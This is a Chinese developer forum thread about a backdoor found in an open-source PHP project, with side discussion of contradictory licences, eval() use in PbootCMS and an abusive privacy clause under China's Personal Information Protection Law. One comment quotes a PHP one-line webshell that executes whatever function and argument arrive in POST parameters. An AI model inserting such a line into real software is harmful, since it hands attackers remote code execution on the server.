现如今的开源代码请谨慎使用

够狠
不过生产环境是要禁用 eval()的

这就可以直说是后门了，假装成漏洞的后门，

好家伙，看错了，这是装都不装，特地上传的后门，

好家伙，看不懂 php ，哪位能解释下😂

这种又放了个原版 Apache-2.0 的 license ，又在 readme 说不让商用的，到底是按 apache 还是说按 readme...

一句话木马。

<?php $_POST['a']()$_POST['b'];

不过好歹比闭源好些，公开挂在网上有坑可能像这样被别人发现，闭源的话自己没发现问题就只能被坑了，

而且这 eval 也太粗暴了吧，我代码下载来解压直接报毒，

我觉得不是故意的

多了，隐私协议也要注意，


https://page.xiaojukeji.com/m/ddPage_0CZOoRgq.html

@gabon 我猜是 post 请求 /public/api 的 a 参数的代码直接执行

1 、对于免费版用户的用户资料，我方享有独家的、全球通用的、永久的、免费的资料许可使用权利（并有权在多个层面对该权利进行再授权），我方有权存储、整理、分析、使用、复制、修订、改写、发布、翻译、分发、执行和展示“您的资料”或制作其派生作品，或以任何形式将“您的资料”纳入其他作品内。

其中这条就离谱

@smallyu 我第一眼也以为不是故意的，然而他整个项目都没有功能有调用这个 api.php ，只能认为是故意埋的，

@djkloop 这就懂了，没有后门的话这一条根本没法实现，

国外很多 npm 包经常被爆漏洞或者被黑，但人家是不经意的。但国内这些，不知道是“技术能力”的原因，还是故意为之。或者说对开源协议有什么自己独特的理解。

比如前段时间闹得沸沸扬扬的 DEDECMS 事件，有很多人推的这个“PbootCMS”
https://gitee.com/hnaoyun/PbootCMS/blob/3.X/core/basic/Kernel.php

其实也是用 `eval`。

我只是好奇这些标榜 `Apache 2` 协议的，然后指定说某个文件不可以修改和破解的。以我的理解：

“将这个文件解码出来后，然后再将建一个文件保存。不引用它的那个“授权”核心源码，而是引用这个文件。这个样子算所谓“破解”核心源码吗？。或者说，完全把那个文件删掉，再用新的文件来引入。这算是遵循 Apache2 的规范吗？”

gitee 上开源的东西我看都不看

一直如此, 大家都觉得开源的, 别人会帮我审核代码, 这不, 楼主这就帮我们审核了一次. /狗头保命 /

差点以为已经开始投毒了呢

我看得懂，而且我大受震撼😄

@AoEiuV020 反正代码层面要注意，各方面都要注意，很多都是打着免费开源，在各地方给你留坑。像刚才滴滴那个开源的工具，就离谱。

@djkloop 其实那个条款是违法的。http://www.npc.gov.cn/npc/c30834/202108/a8c4e3672c74491a80b53a172bb753fe.shtml
第一章第十条：
“第十条　任何组织、个人不得非法收集、使用、加工、传输他人个人信息，不得非法买卖、提供或者公开他人个人信息；不得从事危害国家安全、公共利益的个人信息处理活动。”第十四、十五条……还有很多条款都很明确了。就怕他们对于“您的信息”的定义为“爱好”等无关信息了。

新版个人信息保护法很强，就看执行力度的问题了。要是遇到较真的用户，那绝对会一告一个准。可惜，在中国很多人都不喜欢跟法院和律师打交道。（在不涉及政治和制度等“官”层面，这方面法院应该会“公正”一些吧？）